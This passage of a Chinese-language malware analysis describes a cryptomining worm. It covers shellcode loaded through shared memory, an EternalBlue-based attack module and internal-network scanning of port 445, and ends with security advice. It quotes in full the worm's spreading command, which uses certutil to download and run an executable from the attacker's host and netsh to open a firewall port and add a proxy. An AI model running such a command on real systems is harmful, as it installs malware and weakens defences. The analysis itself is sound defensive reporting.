创建线程判断母体进程是否存在
调用OpenFileMappingA打开共享内存 ， 读取共享内存数据
读取共享内存数据
调用RtlDecompressBuffer函数解压共享内存中的数据 ， 为下一步执行做准备
解压共享内存数据
共享内存数据加压完后会执行 ， 目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行
执行shellcode
尝试挖矿时通信IP为172.105.204.237
2.3 攻击模块
攻击模块从地址hxxp://dl.haqo.net/eb.exez下载 ， 作为子进程Svvhost.Exe启动 ， 分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序 。
子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序 。
Mysmb.pyo为攻击时扫描代码 。
GitHub上也可以看到相关开源代码
扫描内网445端口进行攻击
不仅攻击内网漏洞机器 ， 还随机找几个外网IP尝试攻击 ， 1次攻击完后沉默20分钟
攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
安全建议1. 服务器暂时关闭不必要的端口（如135、139、445） ， 方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html
2. 企业用户在周一上班后 ， 建议使用腾讯御点查杀病毒（个人用户可使用腾讯电脑管家） ， 然后使用漏洞修复功能 ， 修复全网终端存在的系统高危漏洞；
3. 服务器使用高强度密码 ， 切勿使用弱口令 ， 防止黑客暴力破解；
4. 使用杀毒软件拦截可能的病毒攻击；
5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击 。御界高级威胁检测系统 ， 是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据 ， 研发出的独特威胁情报和恶意检测模型系统 。

以上关于本文的内容，仅作参考！温馨提示：如遇健康、疾病相关的问题，请您及时就医或请专业人士给予相关指导!

• 手机自动抢购秒杀软件推荐 京东商城抢购技巧
• 新手电脑如何安装软件 电脑怎么安装
• 设置方法 电脑截图快捷键ctrl加什么
• 遇上情敌别怕 三招让她自动消失
• 1分钟教你设置自动清理垃圾 怎么自动释放内存
• 台式机电脑硬盘怎么安装 硬盘怎么装
• 电脑突然死机 电脑突然死机是什么原因造成的
• 笔记本板载内存可以更换吗 怎么看电脑内存条型号
• 手机上可视化编程app 自动化开发软件有哪些
• 如何将手机网络共享至电脑 怎样将手机网络共享到电脑